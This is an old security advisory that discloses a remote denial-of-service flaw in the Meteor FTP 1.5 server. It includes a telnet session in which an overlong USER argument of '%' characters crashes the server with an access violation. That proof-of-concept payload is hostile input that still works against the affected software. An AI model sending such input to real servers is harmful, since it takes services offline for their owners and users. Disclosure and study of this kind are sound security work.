Remote denial of service vulnerability in Meteor FTP Version 1.5

Type securityvulns
Reporter Securityvulns
Modified 2003-08-10T00:00:00

Description August 8, 2003

Meteor FTP Version 1.5 Remote Denial of Service Vulnerability

1. Introduction

Meteor FTP is a personal ftp server that runs on Windows98/ME/2K/XP.

2. Vulnerability

A vulnerability exists in Meteor FTP Version 1.5, which allows any malicious user to remotely cause a denial of service against the ftp server.

By connecting to the Meteor FTP server and issuing USER followed by large amounts of data, the ftp server will crash.

3. Example

Proof of concept exploit ( is included in the attachment.

root@openwire # telnet 21 Trying Connected to Escape character is '^]'. 220 Service ready for new user USER %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% 530 Not logged on QUIT Connection closed by foreign host. root@openwire # telnet 21 Trying Connected to Escape character is '^]'. USER anonymous QUIT telnet> quit Connection closed.

At this point the server has completely froze up. On the server side, the Meteor FTP spits out a dialog :

"Error: Access Violation at 0x77FCC992 (Tried to write 0x25252525), program terminated."

By clicking "OK", Meteor FTP terminates.

4. Vendor status

Vendor has been notified, waiting for response...

5. Credits

Vulnerability & code by zerash You can view this advisory at : You can view the exploit at :

6. Contact

Please send suggestions, updates, and comments to :